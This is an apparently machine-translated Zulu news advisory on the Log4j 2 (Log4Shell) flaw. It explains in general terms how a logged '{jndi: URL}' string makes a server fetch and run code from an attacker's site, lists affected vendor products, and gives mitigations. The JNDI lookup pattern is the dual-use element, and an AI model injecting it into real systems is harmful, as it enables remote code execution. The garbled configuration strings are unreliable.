Ngezinsuku zokugcina enethini kukhulunywe kakhulu ngokuba sengozini kwe-Log4j lapho kutholwe khona ama-vectors okuhlasela ahlukahlukene kanye nokusetshenziswa okuhlukile okuye kwahlungwa ukuze kusetshenziswe ubungozi.
Ubucayi bodaba ukuthi lolu wuhlaka oludumile lokuhlela ukubhalisa ezinhlelweni ze-Java., okuvumela ikhodi engafanele ukuthi isetshenziswe lapho inani elifomethwe ngokukhethekile libhalwa kurejista ngefomethi ethi "{jndi: URL}". Ukuhlasela kungenziwa ezinhlelweni ze-Java ezifaka amanani atholwe emithonjeni yangaphandle, ngokwesibonelo ngokubonisa amanani ayinkinga emilayezweni yephutha.
Futhi yilokho umhlaseli wenza isicelo se-HTTP kusistimu eqondiwe, ekhiqiza ilogi isebenzisa i-Log4j 2 Esebenzisa i-JNDI ukwenza isicelo kusayithi elilawulwa umhlaseli. Ukuba sengozini bese kubangela inqubo exhashaziwe ukuthi ifike kusayithi futhi yenze ukulayisha. Ezihlaselweni eziningi eziqashiwe, ipharamitha okungeyomhlaseli iyisistimu yokubhalisa ye-DNS, okuhloswe ngayo ukubhalisa isicelo kusayithi ukuze kuhlonzwe izinhlelo ezisengozini.
Njengoba uzakwethu u-Isaac esevele ehlanganyele:
Lokhu kuba sengozini kwe-Log4j kuvumela ukusebenzisa ukuqinisekiswa kokufaka okungalungile ku-LDAP, okuvumela ukukhishwa kwekhodi kude (RCE), kanye nokufaka engozini iseva (ukugcinwa kuyimfihlo, ubuqotho bedatha nokutholakala kwesistimu). Ngaphezu kwalokho, inkinga noma ukubaluleka kwalokhu kuba sengcupheni kulele enanini lezinhlelo zokusebenza namaseva ayisebenzisayo, okuhlanganisa isofthiwe yebhizinisi nezinsizakalo zamafu ezifana ne-Apple iCloud, iSteam, noma imidlalo yevidiyo edumile efana ne-Minecraft: Java Edition, Twitter, Cloudflare, I-Tencent, i-ElasticSearch, i-Redis, i-Elastic Logstash, nende njll.
Ngikhuluma ngalolu daba, muva nje i-Apache Software Foundation ikhishwe ngokusebenzisa okuthunyelwe isifinyezo samaphrojekthi abhekana nokuba sengozini okubalulekile ku-Log4j 2 okuvumela ikhodi engafanele ukuthi isebenze kuseva.
Amaphrojekthi alandelayo e-Apache ayathinteka: I-Archiva, i-Druid, i-EventMesh, i-Flink, i-Fortress, i-Geode, i-Hive, i-JMeter, i-Jena, i-JSPWiki, i-OFBiz, i-Ozone, i-SkyWalking, i-Solr, i-Struts, i-TrafficControl, ne-Calcite Avatica. Ukuba sengozini kuphinde kwathinta imikhiqizo ye-GitHub, okuhlanganisa i-GitHub.com, i-GitHub Enterprise Cloud, ne-GitHub Enterprise Server.
Ezinsukwini zamuva kuye kwaba nokwanda okukhulu womsebenzi ohlobene nokuxhashazwa kokuba sengozini. Ngokwesibonelo, Iphoyinti Lokuhlola lirekhode cishe imizamo yokuxhaphaza eyi-100 ngomzuzu kumaseva ayo angamanga ukuphakama kwayo, futhi u-Sophos umemezele ukutholakala kwe-botnet yezimayini entsha ye-cryptocurrency, eyakhiwe ngamasistimu anobungozi obungavaliwe ku-Log4j 2.
Mayelana nolwazi olukhishiwe mayelana nenkinga:
- Ukuba sengozini kuqinisekisiwe ezithombeni eziningi ezisemthethweni ze-Docker, okuhlanganisa i-couchbase, elasticsearch, flink, solr, izithombe zesiphepho, njll.
- Ubungozi bukhona kumkhiqizo we-MongoDB Atlas Search.
- Inkinga ivela emikhiqizweni eyahlukene yeCisco, okuhlanganisa iCisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco
- Ukubika Okuthuthukisiwe Kwezokuphepha Kwewebhu, I-Cisco Firepower Threat Defense (FTD), I-Cisco Identity Services Engine (ISE), i-Cisco CloudCenter, i-Cisco DNA Center, i-Cisco. BroadWorks, njll.
- Inkinga ikhona kuseva yesicelo se-IBM WebSphere nasemikhiqizweni elandelayo ye-Red Hat: I-OpenShift, i-OpenShift Logging, i-OpenStack Platform, i-Integration Camel, i-CodeReady Studio, i-Data Grid, i-Fuse, ne-AMQ Streams.
- Udaba oluqinisekisiwe ku-Junos Space Network Management Platform, Northstar Controller/Planer, Paragon Insights/Pathfinder/Planer.
- Imikhiqizo eminingi evela ku-Oracle, vmWare, Broadcom, kanye ne-Amazon nayo iyathinteka.
Amaphrojekthi we-Apache athintwa ukuba sengozini kwe-Log4j 2: i-Apache Iceberg, i-Guacamole, i-Hadoop, i-Log4Net, i-Spark, i-Tomcat, i-ZooKeeper, ne-CloudStack.
Abasebenzisi bamaphakheji anenkinga bayelulekwa ukuthi bafake ngokushesha izibuyekezo ezikhishiwe kubo, buyekeza ngokwehlukana inguqulo ye-Log4j 2 noma usethe ipharamitha ethi Log4j2.formatMsgNoLookups ibe iqiniso (ngokwesibonelo, ukwengeza ukhiye "-DLog4j2.formatMsgNoLookup = True" ekuqaleni).
Ukukhiya isistimu kusengozini okungekho kuyo ukufinyelela okuqondile, kwaphakanyiswa ukuthi kusetshenziswe umuthi wokugomela i-Logout4Shell, okuthi, ngokusebenzisa ukuhlasela, udalule ukulungiselelwa kwe-Java "log4j2.formatMsgNoLookups = true", "com.sun.jndi .rmi.into. trustURLCodebase = amanga "kanye" com.sun.jndi.cosnaming.object.trustURLCodebase = amanga "ukuze kuvinjwe ukubonakaliswa okuqhubekayo kokuba sengozini kumasistimu angalawulwa.